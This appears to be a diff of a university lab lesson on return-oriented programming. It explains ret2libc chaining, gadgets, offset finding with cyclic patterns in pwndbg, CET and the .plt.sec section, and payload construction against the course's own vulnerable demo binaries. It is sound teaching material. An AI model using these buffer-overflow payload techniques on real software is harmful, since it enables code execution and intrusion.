(e.g. '/bin/sh') ``` -However, what happens when you need to call multiple functions? Say you need -to call `f1()` and then `f2(0xAB, 0xCD)`? 
The payload should be: +However, what happens when you need to call multiple functions? +Say you need to call `f1()` and then `f2(0xAB, 0xCD)`? The payload should be: + +```text RET + 0x00: addr of f1 RET + 0x04: addr of f2 (return address after f1 finishes) RET + 0x08: JUNK (return address after f2 finishes: we don't care about what happens after the 2 functions are called) @@ -192,7 +149,8 @@ RET + 0x10: 0xCD (param2 of f2) ``` What about if we need to call `f1(0xAB, 0xCD)` and then `f2(0xEF, 0x42)`? -``` + +```text RET + 0x00: addr of f1 RET + 0x04: addr of f2 (return address after f1 finishes) RET + 0x08: 0xAB (param1 of f1) @@ -201,41 +159,47 @@ RET + 0x10: 0x42 (param2 of f2) ``` ### NOP Analogy -While `ret2libc` uses functions directly, ROP uses a finer level of code -execution: instruction groups. Let's explore an example: + +While `ret2libc` uses functions directly, `ROP` uses a finer level of code execution: instruction groups. +Let's explore an example: + ```c int main(void) { char a[16]; read(0, a, 100); - + return 0; } ``` -This code obviously suffers from a stack buffer overflow. The offset to the -return address is 24. So `DOWRD`s from offset 24 onwards will be popped from the -stack and executed. Remember the `NOP` sled concept from previous sessions? -These were long chains of `NOP` instructions (`\x90`) used to pad a payload for -alignment purposes. Since we can't add any new code to the program (_NX_ is -enabled) how could we simulate the effect of a `NOP` sled? Easy! Using return -instructions! +This code obviously suffers from a stack buffer overflow. +The offset to the return address is 24. +So `DWORD`s from offset 24 onwards will be popped from the stack and executed. +Remember the `NOP` sled concept from previous sessions? +These were long chains of `NOP` instructions (`\x90`) used to pad a payload for alignment purposes. +Since we can't add any new code to the program (`NX` is enabled) how could we simulate the effect of a `NOP` sled?
+Easy! +Using return instructions! Let's find the `ret` instructions in a would-be binary: -``` + +```console $ objdump -d hello -M intel | grep $'\t'ret - 80482dd: c3 ret - 804837a: c3 ret - 80483b7: c3 ret - 8048437: c3 ret - 8048444: c3 ret - 80484a9: c3 ret - 80484ad: c3 ret + 80482dd: c3 ret + 804837a: c3 ret + 80483b7: c3 ret + 8048437: c3 ret + 8048444: c3 ret + 80484a9: c3 ret + 80484ad: c3 ret 80484c6: c3 ret ``` -Any and all of these addresses will be ok. The payload could be the following: -``` +Any and all of these addresses will be ok. +The payload could be the following: + +```text RET + 0x00: 0x80482dd RET + 0x04: 0x80482dd RET + 0x08: 0x80482dd @@ -243,13 +207,14 @@ RET + 0x0c: 0x80482dd RET + 0x10: 0x80482dd [...] ``` -The above payload will run like so: the original `ret` (in the normal code flow) -will pop `RET+0x00` off the stack and jump to it. When `RET+0x00` gets popped, -the stack is automatically increased by 4 (on to the next value). The -instruction at `0x80482dd` is another `ret`, which does the same thing as before. -This goes on until another address that is not a `ret` is popped off the stack. + +The above payload will run like so: the original `ret` (in the normal code flow) will pop `RET+0x00` off the stack and jump to it. +When `RET+0x00` gets popped, the stack is automatically increased by 4 (on to the next value). +The instruction at `0x80482dd` is another `ret`, which does the same thing as before. +This goes on until another address that is not a `ret` is popped off the stack. In general, you can use the skeleton below to generate payloads: + ```python #! /usr/bin/python3 import struct, sys @@ -268,14 +233,16 @@ payload += dw(0xdeadc0de) sys.stdout.write(payload.decode('ascii', 'replace')) ``` +## Gadgets and `ROP` Chains -## Gadgets and ROP Chains ### Code Execution -Now that we've understood the basics of Return Oriented Programming, let's -actually do something useful. 
The building blocks of ROP payloads are called -**gadgets**. These are blocks of instructions that end with a `ret` instruction. + +Now that we've understood the basics of Return Oriented Programming, let's actually do something useful. +The building blocks of `ROP` payloads are called **gadgets**. +These are blocks of instructions that end with a `ret` instruction. Here are some *gadgets* from the previous program: -``` + +```text 0x8048443: pop ebp; ret 0x80484a7: pop edi; pop ebp; ret 0x8048441: mov ebp,esp; pop ebp; ret @@ -283,47 +250,47 @@ Here are some *gadgets* from the previous program: 0x80484c3: pop ecx; pop ebx; leave; ret ``` -By carefully placing addresses to such gadgets on the stack we can bring code -execution to almost any context we want. As an example, let's say we would like -to load `0x41424344` into `eax` and `0x61626364` into `ebx`. The payload should -look like this: -``` +By carefully placing addresses to such gadgets on the stack we can bring code execution to almost any context we want. +As an example, let's say we would like to load `0x41424344` into `eax` and `0x61626364` into `ebx`. +The payload should look like this: + +```text RET + 0x00: 0x80482da (pop eax; pop ebx; leave; ret) RET + 0x04: 0x41424344 RET + 0x08: 0x61626364 RET + 0x0c: 0xAABBCCDD (instruction were the gadget's ret will jump to) ``` + Let's see what exactly happens when this payload is given to our binary: + - First the ret addr is popped from the stack and execution goes there. - At `pop eax`, `0x41424344` is loaded into `eax` and the stack is increased. -- At `pop ebx`, `0x61626364` is loaded into `ebx` and the stack is increased -again. -- At `leave`, two things actually happen: `mov esp, ebp; pop ebp`. So the stack -frame is decreased to the previous one (pointed by `ebp`) and `ebp` is updated -to the one before that. So `esp` will now be the old `ebp + 4`. -- At `ret`, the code flow will go to the instruction pointed to by `ebp+4`. 
This -implies that execution will not go to `0xAABBCCDD` but to some other address -that may or may not be in our control (depending on how much we can overflow on -the stack). If it is in our control we can overwrite that address with the rest -of the ROP chain. +- At `pop ebx`, `0x61626364` is loaded into `ebx` and the stack is increased again. +- At `leave`, two things actually happen: `mov esp, ebp; pop ebp`. + So the stack frame is decreased to the previous one (pointed by `ebp`) and `ebp` is updated to the one before that. + So `esp` will now be the old `ebp + 4`. +- At `ret`, the code flow will go to the instruction pointed to by `ebp+4`. + This implies that execution will not go to `0xAABBCCDD` but to some other address that may or may not be in our control (depending on how much we can overflow on the stack). + If it is in our control we can overwrite that address with the rest of the `ROP` chain. ### Changing Register Values -We have now seen how gadgets can be useful if we want the CPU to achieve a -certain state. This is particularly useful on other architectures such as ARM -and x86_64 where functions do not take parameters from the stack but from -registers. As an example, if we want to call `f1(0xAB, 0xCD, 0xEF)` on x86_64 we -first need to know the calling convention for the first three parameters (the -convention for placing the rest of the parameters can be found in -[table here](https://en.wikipedia.org/wiki/X86_calling_conventions#x86-64_calling_conventions)): -``` + +We have now seen how gadgets can be useful if we want the CPU to achieve a certain state. +This is particularly useful on other architectures such as ARM and x86_64 where functions do not take parameters from the stack but from registers. 
+As an example, if we want to call `f1(0xAB, 0xCD, 0xEF)` on x86_64 we first need to know the calling convention for the first three parameters (the convention for placing the rest of the parameters can be found in [table here](https://en.wikipedia.org/wiki/X86_calling_conventions#x86-64_calling_conventions)): + +```text 1st param: RDI 2nd param: RSI 3rd param: RDX ``` -Now we need to find gadgets for each of these parameters. Let's assume these 2 -scenarios: Scenario 1: -``` +Now we need to find gadgets for each of these parameters. +Let's assume these 2 scenarios: + +**Scenario 1:** + +```text 0x400124: pop rdi; pop rsi; ret 0x400235: pop rdx; ret 0x400440: f1() @@ -337,8 +304,9 @@ RET + 0x20: val of RDX RET + 0x28: f1 ``` -Scenario 2: -``` +**Scenario 2:** + +```text 0x400125: pop rdi; ret 0x400252: pop rsi; ret 0x400235: pop rdx; ret @@ -349,61 +317,67 @@ RET + 0x00: 0x400125 RET + 0x08: val of RDI (0xAB) RET + 0x10: 0x400252 RET + 0x18: val of RSI (0xCD) -RET + 0x20: 0x400235 +RET + 0x20: 0x400235 RET + 0x28: val of RDX RET + 0x30: f1 ``` -Notice that because the architecture is 64 bits wide, the values on the stack -are not dwords but qwords (quad words: 8 bytes wide). Thus, the offsets between -the values in the payload are 8, instead of 4 (as they would be on a 32-bit -architecture). + +Notice that because the architecture is 64 bits wide, the values on the stack are not dwords but qwords (quad words: 8 bytes wide). +Thus, the offsets between the values in the payload are 8, instead of 4 (as they would be on a 32-bit architecture). ### Clearing the Stack -The second use of gadgets is to clear the stack. Remember the issue we had in -the [Motivation](#motivation) section? Let's solve it using gadgets. We need to call -`f1(0xAB, 0xCD)` and then `f2(0xEF, 0x42)`. Our initial solution was: -``` + +The second use of gadgets is to clear the stack. +Remember the issue we had in the [Motivation](#motivation) section? +Let's solve it using gadgets. 
+We need to call `f1(0xAB, 0xCD)` and then `f2(0xEF, 0x42)`. +Our initial solution was: + +```text RET + 0x00: addr of f1 RET + 0x04: addr of f2 (return address after f1 finishes) -RET + 0x08: 0xAB (param1 of f1) +RET + 0x08: 0xAB (param1 of f1) RET + 0x0c: 0xCD (param2 of f1) but this should also be 0xEF (param1 of f2) -RET + 0x10: 0x42 (param2 of f2) +RET + 0x10: 0x42 (param2 of f2) ``` -Note that now, for the sake of clarity, we're moving back to `x32`, so that -parameters are again passed on the stack. +Note that now, for the sake of clarity, we're moving back to `x32`, so that parameters are again passed on the stack. -The problem is that those parameters of `f1` are getting in the way of calling -`f2`. We need to find a `pop pop ret` gadget. The actual registers are not -important, as we only need to clear 2 values from the stack. -``` +The problem is that those parameters of `f1` are getting in the way of calling `f2`. +We need to find a `pop pop ret` gadget. +The actual registers are not important, as we only need to clear 2 values from the stack. 
+ +```text RET + 0x00: addr of f1 -RET + 0x04: addr of (pop eax, pop ebx, ret) -RET + 0x08: 0xAB (param1 of f1) +RET + 0x04: addr of (pop eax, pop ebx, ret) +RET + 0x08: 0xAB (param1 of f1) RET + 0x0c: 0xCD (param2 of f1) RET + 0x10: addr of f2 RET + 0x14: JUNK RET + 0x18: 0xEF (param1 of f2) -RET + 0x1c: 0x42 (param2 of f2) +RET + 0x1c: 0x42 (param2 of f2) ``` Now we can even call the next function `f3` if we repeat the trick: -``` + +```text RET + 0x00: addr of f1 -RET + 0x04: addr of (pop eax, pop ebx, ret) -RET + 0x08: 0xAB (param1 of f1) +RET + 0x04: addr of (pop eax, pop ebx, ret) +RET + 0x08: 0xAB (param1 of f1) RET + 0x0c: 0xCD (param2 of f1) RET + 0x10: addr of f2 -RET + 0x14: addr of (pop eax, pop ebx, ret) +RET + 0x14: addr of (pop eax, pop ebx, ret) RET + 0x18: 0xEF (param1 of f2) -RET + 0x1c: 0x42 (param2 of f2) +RET + 0x1c: 0x42 (param2 of f2) RET + 0x20: addr of f3 ``` - ## Some Useful Tricks + ### Memory Spraying + Let's take the following program: + ```c int main() { @@ -411,26 +385,22 @@ int main() char a,b,c; char buf[23]; read(0, buf, 100); - + return 0; } ``` -It's a fairly simple overflow, but just how fast can you figure out the offset -to the return address? How much padding do you need? There is a shortcut that -you can use to figure this out in under 30 seconds without looking at the -*Assembly* code. - -A [De Bruijn sequence](https://en.wikipedia.org/wiki/De_Bruijn_sequence) is a -string of symbols out of a given alphabet in which each consecutive K symbols -only appear once in the whole string. If we can construct such a string out of -printable characters then we only need to know the Segmentation Fault address. -Converting it back to 4 bytes and searching for it in the initial string will -give us the exact offset to the return address. 
- -[pwndbg]() can help you do this, using the -[cyclic](https://docs.pwntools.com/en/stable/util/cyclic.html) package from the -`pwnlib` library: -``` + +It's a fairly simple overflow, but just how fast can you figure out the offset to the return address? +How much padding do you need? +There is a shortcut that you can use to figure this out in under 30 seconds without looking at the assembly code. + +A [De Bruijn sequence](https://en.wikipedia.org/wiki/De_Bruijn_sequence) is a string of symbols out of a given alphabet in which each consecutive K symbols only appear once in the whole string. +If we can construct such a string out of printable characters then we only need to know the Segmentation Fault address. +Converting it back to 4 bytes and searching for it in the initial string will give us the exact offset to the return address. + +[pwndbg](https://github.com/pwndbg/pwndbg) can help you do this, using the [cyclic](https://docs.pwntools.com/en/stable/util/cyclic.html) package from the `pwnlib` library: + +```console pwndbg> cyclic 100 # create a 100-character long De Bruijn sequence aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa @@ -441,11 +411,11 @@ pwndbg> cyclic -l faaa # the offset of faaa in the above cyclic pattern is 20 20 ``` -``` +```console pwndbg> cyclic 100 aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa pwndbg> run -Starting program: /media/teo/2TB/Chestii/Poli/SSS/Exploit/sss-exploit/sessions/return-oriented-programming/hello +Starting program: /media/teo/2TB/Chestii/Poli/SSS/Exploit/sss-exploit/sessions/return-oriented-programming/hello aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa Program received signal SIGSEGV, Segmentation fault. 
@@ -460,7 +430,7 @@ LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ESI 0xf7fa8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1ead6c EBP 0x61616173 ('saaa') ESP 0x61616178 ('uaaa') - EIP 0x61616174 ('taaa') + EIP 0x61616174 ('taaa') ──────────────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────────── Invalid address 0x61616174 [...] @@ -473,7 +443,8 @@ the buffer is 76, as the address that EIP points to is `0x61616174`, i.e. `'taaa'`, which lies at offset 76 in the cyclic pattern we've just generated. ### checksec in pwndbg -``` + +```console pwndbg> checksec [*] '/media/teo/2TB/Chestii/Poli/SSS/Exploit/sss-exploit/sessions/return-oriented-programming/hello' Arch: i386-32-little @@ -484,7 +455,8 @@ pwndbg> checksec ``` ### Finding Gadgets in `pwndbg` -``` + +```console pwndbg> rop Gadgets information ============================================================ @@ -509,33 +481,27 @@ pwndbg> rop --grep "pop .* ; pop .* ; ret" # you can perform a finer search usi 0x08049240 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x08049242 : pop edi ; pop ebp ; ret 0x08049241 : pop esi ; pop edi ; pop ebp ; ret - ``` - ## Further Reading -### ROP Gadgets in `pwntools` -`pwntools` has a rather advanced -[ROP module](https://docs.pwntools.com/en/stable/rop/rop.html) that is capable -of crafting ROP attacks corresponding to various functions by creating -concatenating chains of ROP adresses, also known as ROP chains. -For this session, you won't need to use this module, but it may come in handy in -the future. +### `ROP` Gadgets in `pwntools` + +`pwntools` has a rather advanced [`ROP` module](https://docs.pwntools.com/en/stable/rop/rop.html) that is capable of crafting `ROP` attacks corresponding to various functions by creating concatenating chains of `ROP` addresses, also known as `ROP` chains. + +For this session, you won't need to use this module, but it may come in handy in the future. 
### Linux x86 Program Start Up -Notice that the `__libc_start_main` will always be present in the relocation -table. As you discovered in the session dedicated to -[executable file formats](https://github.com/hexcellents/sss-binary/tree/master/sessions/executable-file-formats), -this is the function called by the code from the `_start` label, which, in turn, -calls the `main()` function. -To find more details about the startup of a Linux x86 program, you can read -about it -[here](http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html). +Notice that the `__libc_start_main` will always be present in the relocation table. +As you discovered in the session dedicated to [executable file formats](https://github.com/hexcellents/sss-binary/tree/master/sessions/executable-file-formats), this is the function called by the code from the `_start` label, which, in turn, calls the `main()` function. + +To find more details about the startup of a Linux x86 program, you can read about it [here](http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html). ### The `.plt.sec` Schema + Let's go back to the small piece of code at the beginning of this lecture: + ```c #include @@ -546,10 +512,9 @@ int main(void) } ``` -If we compile it with a more modern (later than 2019) version of even the most -"old-school" compilers, such as `gcc`, we will notice a slight (but actually -important) difference in the `.plt` schema used by the resulting binary file. -``` +If we compile it with a more modern (later than 2019) version of even the most "old-school" compilers, such as `gcc`, we will notice a slight (but actually important) difference in the `.plt` schema used by the resulting binary file. + +```console $ gcc -m32 -fno-PIC -no-pie hello.c -o hello $ objdump -M intel -d hello [...] 
@@ -559,11 +524,11 @@ Disassembly of section .plt: 8049030: ff 35 04 c0 04 08 push DWORD PTR ds:0x804c004 8049036: ff 25 08 c0 04 08 jmp DWORD PTR ds:0x804c008 804903c: 0f 1f 40 00 nop DWORD PTR [eax+0x0] - 8049040: f3 0f 1e fb endbr32 + 8049040: f3 0f 1e fb endbr32 8049044: 68 00 00 00 00 push 0x0 8049049: e9 e2 ff ff ff jmp 8049030 <.plt> 804904e: 66 90 xchg ax,ax - 8049050: f3 0f 1e fb endbr32 + 8049050: f3 0f 1e fb endbr32 8049054: 68 08 00 00 00 push 0x8 8049059: e9 d2 ff ff ff jmp 8049030 <.plt> 804905e: 66 90 xchg ax,ax @@ -571,26 +536,28 @@ Disassembly of section .plt: Disassembly of section .plt.sec: 08049060 : - 8049060: f3 0f 1e fb endbr32 + 8049060: f3 0f 1e fb endbr32 8049064: ff 25 0c c0 04 08 jmp DWORD PTR ds:0x804c00c 804906a: 66 0f 1f 44 00 00 nop WORD PTR [eax+eax*1+0x0] [...] ``` -Now it seems there are two `.plt` sections: the "classic" `.plt` and a new -`.plt.sec` section. Moreover, the entries in the `.plt.sec` section are very -similar to those we've previously shown as being part of `.plt`. So why 2 -`.plt`'s? And if the initial `.plt` entries have been moved over to `.plt.sec`, -what is the purpose of the `.plt` section now? +Now it seems there are two `.plt` sections: the "classic" `.plt` and a new `.plt.sec` section. +Moreover, the entries in the `.plt.sec` section are very similar to those we've previously shown as being part of `.plt`. +So why 2 `.plt`'s? +And if the initial `.plt` entries have been moved over to `.plt.sec`, what is the purpose of the `.plt` section now? First, let's check the call to `puts()` itself: -``` + +```console $ objdump -D -j .text -M intel hello | grep puts 80491b3: e8 a8 fe ff ff call 8049060 ``` + So we see that the function being called now resides in the `.plt.sec` section. What about the offset that `.plt.sec` redirect jumps to (i.e. `0x804c00c`)? 
-``` + +```console $ objdump -s -M intel -j .got.plt --start-address=0x0804c00c hello hello: file format elf32-i386 @@ -601,101 +568,80 @@ Contents of section .got.plt: Similarly to what we did previously, we now see that `0x804c00c` points to address `0x08049040`, which is this code inside the `.plt` section: -``` -8049040: f3 0f 1e fb endbr32 + +```text +8049040: f3 0f 1e fb endbr32 8049044: 68 00 00 00 00 push 0x0 8049049: e9 e2 ff ff ff jmp 8049030 <.plt> 804904e: 66 90 xchg ax,ax ``` -So with the `.plt.sec` schema, there are 2 redirects: one from `.plt.sec` to -`.got` (or `.got.plt` to be more precise) and another from `.got.plt` to `.plt`. -Notice in the `.plt` stub above that, like before, `0x0` is pushed onto the -stack before the resolver is called, so that the dynamic linker can change it to -the actual address of `puts()` from libc. +So with the `.plt.sec` schema, there are 2 redirects: one from `.plt.sec` to `.got` (or `.got.plt` to be more precise) and another from `.got.plt` to `.plt`. +Notice in the `.plt` stub above that, like before, `0x0` is pushed onto the stack before the resolver is called, so that the dynamic linker can change it to the actual address of `puts()` from libc. So why use `.plt.sec` at all if in the end it looks like it does the same thing? -Well, `.plt.sec` is an x86-only security enhancement of the `.plt` section -(hence the `.sec` part of the name, duh...), that is used only when a security -enhancement feature called **CET (Control-flow Enforcement Technology)** is -enabled. In this comment, I'll explain what the feature is and why we have two -PLT sections if CET is enabled. - -So, what does CET do? CET introduces a new restriction to indirect jump -instructions. In order to understand how CET works, let's assume that it is -enabled. 
Then, if you execute an indirect jump instruction, the processor -verifies that a special "landing pad" instruction, which is actually a -repurposed `NOP` instruction (now called `endbr32` or `endbr64`, as you can see -in the above snippets), is at the jump target. If the jump target does not start -with that instruction, the processor raises an exception instead of continuing -to execute code. - -If CET is enabled, the compiler places `endbr` instructions to all locations -where indirect jumps may lead. This mechanism makes it extremely hard to -transfer the control to a middle of a function that is not supporsed to be a -indirect jump target, preventing certain types of attacks, such as ROP or JOP -(jump-oriented programming; very similar to ROP). +Well, `.plt.sec` is an x86-only security enhancement of the `.plt` section (hence the `.sec` part of the name, duh...), that is used only when a security enhancement feature called **CET (Control-flow Enforcement Technology)** is enabled. +In this comment, I'll explain what the feature is and why we have two PLT sections if CET is enabled. + +So, what does CET do? +CET introduces a new restriction to indirect jump instructions. +In order to understand how CET works, let's assume that it is enabled. +Then, if you execute an indirect jump instruction, the processor verifies that a special "landing pad" instruction, which is actually a repurposed `NOP` instruction (now called `endbr32` or `endbr64`, as you can see in the above snippets), is at the jump target. +If the jump target does not start with that instruction, the processor raises an exception instead of continuing to execute code. + +If CET is enabled, the compiler places `endbr` instructions to all locations where indirect jumps may lead. 
+This mechanism makes it extremely hard to transfer control to the middle of a function that is not supposed to be an indirect jump target, preventing certain types of attacks, such as `ROP` or JOP (jump-oriented programming; very similar to `ROP`). Now, let's explain why we have this extra PLT section for when CET is enabled. -Since you can indirectly jump to a PLT entry, we have to make PLT entries start -with an `endbr` instruction. The problem is there was no extra space for `endbr` -(which is 4 bytes long) in the old `.plt` entry schema, as the PLT entry is only -16 bytes long and all of them are already used. +Since you can indirectly jump to a PLT entry, we have to make PLT entries start with an `endbr` instruction. +The problem is there was no extra space for `endbr` (which is 4 bytes long) in the old `.plt` entry schema, as the PLT entry is only 16 bytes long and all of them are already used. -In order to deal with the issue, each PLT entry was splt into two separate -entries. Remember that each PLT entry contains code to jump to an address read -from `.got.plt` **AND** code to resolve a dynamic symbol lazily. With the 2-PLT -schema, the former code is written to `.plt.sec`, and the latter code is written -to `.plt`, as demonstrated above. +In order to deal with the issue, each PLT entry was split into two separate entries. +Remember that each PLT entry contains code to jump to an address read from `.got.plt` **AND** code to resolve a dynamic symbol lazily. +With the 2-PLT schema, the former code is written to `.plt.sec`, and the latter code is written to `.plt`, as demonstrated above.
#### More about CET and `endbr` -- A more in-depth look at the inner workings of CET and the concept of the -**Shadow Stack** that it uses, can be found -[here](https://software.intel.com/content/www/us/en/develop/articles/technical-look-control-flow-enforcement-technology.html) -and -[here](https://software.intel.com/content/www/us/en/develop/articles/technical-look-control-flow-enforcement-technology.html) -- The way `endbr` instructions interact with the CPU is explained -[here](https://cdrdv2.intel.com/v1/dl/getContent/631121), at page 38 + +- A more in-depth look at the inner workings of CET and the concept of the **Shadow Stack** that it uses, can be found [here](https://software.intel.com/content/www/us/en/develop/articles/technical-look-control-flow-enforcement-technology.html) and [here](https://software.intel.com/content/www/us/en/develop/articles/technical-look-control-flow-enforcement-technology.html) +- The way `endbr` instructions interact with the CPU is explained [here](https://cdrdv2.intel.com/v1/dl/getContent/631121), at page 38 #### TLDR -Lazy symbol resolution in the 2-PLT schema works in the usual way, except -that the regular `.plt` is now called `.plt.sec` and `.plt` is repurposed to -contain only code for lazy symbol resolution. +Lazy symbol resolution in the 2-PLT schema works in the usual way, except that the regular `.plt` is now called `.plt.sec` and `.plt` is repurposed to contain only code for lazy symbol resolution. + +## Putting it All Together: Demo -## Putting it all Together: Demo -Now that we've learned the theoretical aspects of what Return Oriented -Programming is, let's put everything in practice as part of a demo. +Now that we've learned the theoretical aspects of what Return-Oriented Programming is, let's put everything in practice as part of a demo. -Navigate to the folder [00-demo](activities/00-demo). Notice that it contains -two executables, one compiled for 32 bits (`vuln`) and the other for 64 bits -(`vuln64`). 
TODO: diff +Navigate to the folder [00-demo](activities/00-demo). +Notice that it contains two executables, one compiled for 32 bits (`vuln`) and the other for 64 bits (`vuln64`). -Looking at their source code (it's one and the same for both of them), we can -easily identify their vulnerability: the `reader` function reads (duh...) 128 -bytes from `stdin` into a buffer whose capacity is only 64 bytes. So we'll be -able to overflow this buffer. We aim to do this in order to showcase the concept -of **code reuse**. +Looking at their source code (it's one and the same for both of them), we can easily identify their vulnerability: the `reader` function reads (duh...) 128 bytes from `stdin` into a buffer whose capacity is only 64 bytes. +So we'll be able to overflow this buffer. +We aim to do this in order to showcase the concept of **code reuse**. ### Calling a Function -The most basic type of code reuse is calling a function. For this, we'll be -calling the `warcraft` function in the `vuln` and `vuln64` binaries mentioned -above. In order to do this, we'll need to know: -1. the offset of the return address inside our buffer -2. the address of the `warcraft` function inside the binary. - -For all our exploits we'll be using the `exploit.py` script, which is also -available in the [00-demo](activities/00-demo) folder. Notice that `pwntools` -provides a functionality similar to `nm`, by which we can obtain the addresses -of various sybols in the binary (as long as it hasn't been stripped): + +The most basic type of code reuse is calling a function. +For this, we'll be calling the `warcraft` function in the `vuln` and `vuln64` binaries mentioned above. + +In order to do this, we'll need to know: + +- the offset of the return address inside our buffer +- the address of the `warcraft` function inside the binary. + +For all our exploits we'll be using the `exploit.py` script, which is also available in the [00-demo](activities/00-demo) folder. 
+Notice that `pwntools` provides a functionality similar to `nm`, by which we can obtain the addresses of various symbols in the binary (as long as it hasn't been stripped): + ```python e = ELF(filename) warcraft_address = e.symbols[b"warcraft"] ``` -As of now, requirement #2 mentioned above is complete. In order to also complete -the first requirement, we'll use `objdump` and check the `reader` function: -``` +As of now, the second requirement mentioned above is complete. +In order to also complete the first requirement, we'll use `objdump` and check the `reader` function: + +```console $ objdump -M intel -d vuln 08048529 : 8048529: 55 push ebp @@ -709,106 +655,99 @@ $ objdump -M intel -d vuln 804854a: 50 push eax 804854b: e8 10 fe ff ff call 8048360 ``` -Our vulnerable buffer is the first parameter of `fgets`, which is at offset -`ebp - 0x40` i.e. `ebp - 64`. Which means that the offset of the return address -is `64 + 4 = 68` bytes into this buffer (remember how a stack frame looks like). -So, in order to call the `warcraft` function, we'll give our binary a payload -made up of a padding of 68 bytes, followed by the address of `warcraft`, written -in _little endian_ representation, which can be written like this: +Our vulnerable buffer is the first parameter of `fgets`, which is at offset `ebp - 0x40` i.e. `ebp - 64`. +Which means that the offset of the return address is `64 + 4 = 68` bytes into this buffer (remember what a stack frame looks like). + +So, in order to call the `warcraft` function, we'll give our binary a payload made up of a padding of 68 bytes, followed by the address of `warcraft`, written in little endian representation, which can be written like this: + ```python offset = 0x40 + 4 payload = offset * b"A" + pack(warcraft_address) ``` -Now our exploit is done.
In order to perform this exploit on `vuln64`, simply -run `objdump` on this binary and remember that the length of a pointer on a -64-bit architecture is 8 bytes, which means that the offset of the return -address is going to be `rbp + 8`. -One thing to keep in mind is that you are by no means required to use addresses -that point to the beginning of functions in your payloads. You can use any valid -address from the `.text` section and the exploit should work just fine in -executing code from the address you provide it. +Now our exploit is done. +In order to perform this exploit on `vuln64`, simply run `objdump` on this binary and remember that the length of a pointer on a 64-bit architecture is 8 bytes, which means that the offset of the return address is going to be `rbp + 8`. + +One thing to keep in mind is that you are by no means required to use addresses that point to the beginning of functions in your payloads. +You can use any valid address from the `.text` section and the exploit should work just fine in executing code from the address you provide it. -Now on to our next scenario: what if the function we're calling requires a -parameter? +Now on to our next scenario: what if the function we're calling requires a parameter? ### Calling a Function with Parameters -Let's first look at the stack of a function when it's called "normally", i.e. -with a `call` instruction. Let's use the `overwatch` function in `vuln.c` as an -example. The picture below shows where its parameter is placed. - -![Overwatch Stack](assets/overwatch_stack_simple.png) - -Furthermore, as expected, the function retrieves its parameter from address -`ebp + 8`, as shown above. How can we craft a payload so that, upon entering the -function, the required `0xdeadbeef` parameter is where the function expects it -to be? - -We'll obviously need to place `0xdeadbeef` on the stack (in little endian -representation, of course), but where? 
After the function's preamble -(`push ebp; mov esp, ebp`), `ebp` points to the location where the previous -stack pointer it saved. Above it, the function expects to find its return -address. Thus, we need to write 4 padding bytes in its place. The next 4 bytes -are the first parameter. Just for reference, the next 4 bytes (`ebp + 12`) are -the second parameter and so on. So, in order to call `overwatch` with the -`0xdeadbeef` parameter, the payload would look like this: + +Let's first look at the stack of a function when it's called "normally", i.e. with a `call` instruction. +Let's use the `overwatch` function in `vuln.c` as an example. +The picture below shows where its parameter is placed. + +![Overwatch Stack](../media/overwatch_stack_simple.png) + +Furthermore, as expected, the function retrieves its parameter from address `ebp + 8`, as shown above. +How can we craft a payload so that, upon entering the function, the required `0xdeadbeef` parameter is where the function expects it to be? + +We'll obviously need to place `0xdeadbeef` on the stack (in little endian representation, of course), but where? +After the function's preamble (`push ebp; mov ebp, esp`), `ebp` points to the location where the previous frame pointer is saved. +Above it, the function expects to find its return address. +Thus, we need to write 4 padding bytes in its place. +The next 4 bytes are the first parameter. +Just for reference, the next 4 bytes (`ebp + 12`) are the second parameter and so on. +So, in order to call `overwatch` with the `0xdeadbeef` parameter, the payload would look like this: + ```python payload = offset * b"A" + pack(overwatch_address) + 4 * b"B" + pack(0xdeadbeef) ``` -Take a look at those 4 `B`'s in the payload above. We agreed that they are -`overwatch`'s expected return address. So if we wanted to call another function, -we would only need to replace them with that function's address. Pretty simple, -right? But what if we wanted to call a third function?
Well, then we would need -to overwrite the next 4 bytes in our payload with a third address. Easy! But now -we have actually run into trouble: the next 4 bytes are `overwatch`'s parameter. -In this situation it looks like we **either** call `overwatch` or we call a third -function. Not cool. In this case, `overwatch`s stack would look like this: +Take a look at those 4 `B`'s in the payload above. +We agreed that they are `overwatch`'s expected return address. +So if we wanted to call another function, we would only need to replace them with that function's address. +Pretty simple, right? +But what if we wanted to call a third function? +Well, then we would need to overwrite the next 4 bytes in our payload with a third address. +Easy! +But now we have actually run into trouble: the next 4 bytes are `overwatch`'s parameter. +In this situation it looks like we **either** call `overwatch` or we call a third function. +Not cool. +In this case, `overwatch`'s stack would look like this: -![Overwatch Stack with Conflicting Parameter/Address](assets/overwatch_stack_conflict.png) +![Overwatch Stack with Conflicting Parameter/Address](../media/overwatch_stack_conflict.png) -It seems we need another mechanism so that we can call **all 3 functions** with -all their correct parameters. Enter ROPs! +It seems we need another mechanism so that we can call **all 3 functions** with all their correct parameters. +Enter `ROP`s! ### Calling Multiple Functions -What we need in order to solve the dilemma presented above is a means by which -to **remove** `overwatch`'s parameter (i.e. `0xdeadbeef`) from the stack once -the function is finished. We know that the `pop` instruction is good for -removing stuff from the stack. So what we need is to execute the following two -instructions: -```assembly + +What we need in order to solve the dilemma presented above is a means by which to **remove** `overwatch`'s parameter (i.e. `0xdeadbeef`) from the stack once the function is finished.
